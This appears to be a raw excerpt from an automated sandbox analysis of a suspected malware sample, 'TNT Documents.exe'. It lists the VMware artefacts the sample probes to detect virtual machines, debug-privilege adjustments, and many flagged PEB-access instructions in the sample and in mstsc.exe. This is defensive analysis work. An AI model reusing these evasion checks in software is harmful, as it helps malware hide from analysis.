Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000B.00000000.298506976.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.339998059.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\Desktop\TNT Documents.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h] 7_2_0157B944
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h] 7_2_0155B171
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C962 mov eax, dword ptr fs:[00000030h] 7_2_0155C962
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559100 mov eax, dword ptr fs:[00000030h] 7_2_01559100
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158513A mov eax, dword ptr fs:[00000030h] 7_2_0158513A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov eax, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov ecx, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0155B1E1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E41E8 mov eax, dword ptr fs:[00000030h] 7_2_015E41E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582990 mov eax, dword ptr fs:[00000030h] 7_2_01582990
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C182 mov eax, dword ptr fs:[00000030h] 7_2_0157C182
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A185 mov eax, dword ptr fs:[00000030h] 7_2_0158A185
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h] 7_2_015D51BE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h] 7_2_015861A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D69A6 mov eax, dword ptr fs:[00000030h] 7_2_015D69A6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01570050 mov eax, dword ptr fs:[00000030h] 7_2_01570050
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01612073 mov eax, dword ptr fs:[00000030h] 7_2_01612073
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621074 mov eax, dword ptr fs:[00000030h] 7_2_01621074
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h] 7_2_015D7016
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] 7_2_0158002D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01624015 mov eax, dword ptr fs:[00000030h] 7_2_01624015
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h] 7_2_0156B02A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov ecx, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015558EC mov eax, dword ptr fs:[00000030h] 7_2_015558EC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559080 mov eax, dword ptr fs:[00000030h] 7_2_01559080
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h] 7_2_015D3884
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0158F0BF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h] 7_2_0158F0BF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015990AF mov eax, dword ptr fs:[00000030h] 7_2_015990AF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155F358 mov eax, dword ptr fs:[00000030h] 7_2_0155F358
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB40 mov eax, dword ptr fs:[00000030h] 7_2_0155DB40
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h] 7_2_01583B7A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB60 mov ecx, dword ptr fs:[00000030h] 7_2_0155DB60
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628B58 mov eax, dword ptr fs:[00000030h] 7_2_01628B58
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161131B mov eax, dword ptr fs:[00000030h] 7_2_0161131B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h] 7_2_015D53CA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157DBE9 mov eax, dword ptr fs:[00000030h] 7_2_0157DBE9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01625BA5 mov eax, dword ptr fs:[00000030h] 7_2_01625BA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158B390 mov eax, dword ptr fs:[00000030h] 7_2_0158B390
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582397 mov eax, dword ptr fs:[00000030h] 7_2_01582397
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h] 7_2_01561B8F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160D380 mov ecx, dword ptr fs:[00000030h] 7_2_0160D380
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161138A mov eax, dword ptr fs:[00000030h] 7_2_0161138A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h] 7_2_01584BAD
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h] 7_2_0160B260
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628A62 mov eax, dword ptr fs:[00000030h] 7_2_01628A62
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E4257 mov eax, dword ptr fs:[00000030h] 7_2_015E4257
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559240 mov eax, dword ptr fs:[00000030h] 7_2_01559240
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159927A mov eax, dword ptr fs:[00000030h] 7_2_0159927A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161EA55 mov eax, dword ptr fs:[00000030h] 7_2_0161EA55
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h] 7_2_0155AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov eax, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov ecx, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01573A1C mov eax, dword ptr fs:[00000030h] 7_2_01573A1C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01568A0A mov eax, dword ptr fs:[00000030h] 7_2_01568A0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h] 7_2_01594A2C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h] 7_2_0161AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582ACB mov eax, dword ptr fs:[00000030h] 7_2_01582ACB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582AE4 mov eax, dword ptr fs:[00000030h] 7_2_01582AE4
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h] 7_2_0158D294
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0156AAB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0158FAB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] 7_2_015552A5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01577D50 mov eax, dword ptr fs:[00000030h] 7_2_01577D50
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01593D43 mov eax, dword ptr fs:[00000030h] 7_2_01593D43
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3540 mov eax, dword ptr fs:[00000030h] 7_2_015D3540
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h] 7_2_0157C577
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628D34 mov eax, dword ptr fs:[00000030h] 7_2_01628D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161E539 mov eax, dword ptr fs:[00000030h] 7_2_0161E539
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h] 7_2_01584D3B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AD30 mov eax, dword ptr fs:[00000030h] 7_2_0155AD30
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015DA537 mov eax, dword ptr fs:[00000030h] 7_2_015DA537
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0161FDE2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01608DF1 mov eax, dword ptr fs:[00000030h] 7_2_01608DF1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov ecx, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0156D5E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h] 7_2_0158FD9B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016205AC mov eax, dword ptr fs:[00000030h] 7_2_016205AC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 mov eax, dword ptr fs:[00000030h] 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] 7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]7_2_01581DB5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]7_2_01581DB5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]7_2_01581DB5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015835A1 mov eax, dword ptr fs:[00000030h]7_2_015835A1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h]7_2_015EC450
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h]7_2_015EC450
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A44B mov eax, dword ptr fs:[00000030h]7_2_0158A44B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157746D mov eax, dword ptr fs:[00000030h]7_2_0157746D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]7_2_0162740D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]7_2_0162740D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]7_2_0162740D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158BC2C mov eax, dword ptr fs:[00000030h]7_2_0158BC2C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016114FB mov eax, dword ptr fs:[00000030h]7_2_016114FB
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]7_2_015D6CF0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]7_2_015D6CF0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]7_2_015D6CF0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628CD6 mov eax, dword ptr fs:[00000030h]7_2_01628CD6
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156849B mov eax, dword ptr fs:[00000030h]7_2_0156849B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628F6A mov eax, dword ptr fs:[00000030h]7_2_01628F6A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156EF40 mov eax, dword ptr fs:[00000030h]7_2_0156EF40
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156FF60 mov eax, dword ptr fs:[00000030h]7_2_0156FF60
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157F716 mov eax, dword ptr fs:[00000030h]7_2_0157F716
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h]7_2_015EFF10
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h]7_2_015EFF10
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]7_2_0158A70E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]7_2_0158A70E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158E730 mov eax, dword ptr fs:[00000030h]7_2_0158E730
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]7_2_0162070D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]7_2_0162070D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]7_2_01554F2E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]7_2_01554F2E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015937F5 mov eax, dword ptr fs:[00000030h]7_2_015937F5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01568794 mov eax, dword ptr fs:[00000030h]7_2_01568794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]7_2_015D7794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]7_2_015D7794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]7_2_015D7794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]7_2_0161AE44
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]7_2_0161AE44
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156766D mov eax, dword ptr fs:[00000030h]7_2_0156766D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]7_2_0158A61C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]7_2_0158A61C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]7_2_0155C600
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]7_2_0155C600
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]7_2_0155C600
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01588E00 mov eax, dword ptr fs:[00000030h]7_2_01588E00
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FE3F mov eax, dword ptr fs:[00000030h]7_2_0160FE3F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611608 mov eax, dword ptr fs:[00000030h]7_2_01611608
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155E620 mov eax, dword ptr fs:[00000030h]7_2_0155E620
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015836CC mov eax, dword ptr fs:[00000030h]7_2_015836CC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01598EC7 mov eax, dword ptr fs:[00000030h]7_2_01598EC7
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FEC0 mov eax, dword ptr fs:[00000030h]7_2_0160FEC0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628ED6 mov eax, dword ptr fs:[00000030h]7_2_01628ED6
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015676E2 mov eax, dword ptr fs:[00000030h]7_2_015676E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015816E0 mov ecx, dword ptr fs:[00000030h]7_2_015816E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]7_2_01620EA5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]7_2_01620EA5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]7_2_01620EA5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFE87 mov eax, dword ptr fs:[00000030h]7_2_015EFE87
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D46A7 mov eax, dword ptr fs:[00000030h]7_2_015D46A7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D7D50 mov eax, dword ptr fs:[00000030h]17_2_055D7D50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F3D43 mov eax, dword ptr fs:[00000030h]17_2_055F3D43
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633540 mov eax, dword ptr fs:[00000030h]17_2_05633540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]17_2_055DC577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]17_2_055DC577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0563A537 mov eax, dword ptr fs:[00000030h]17_2_0563A537
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688D34 mov eax, dword ptr fs:[00000030h]17_2_05688D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567E539 mov eax, dword ptr fs:[00000030h]17_2_0567E539
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]17_2_055E4D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]17_2_055E4D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]17_2_055E4D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
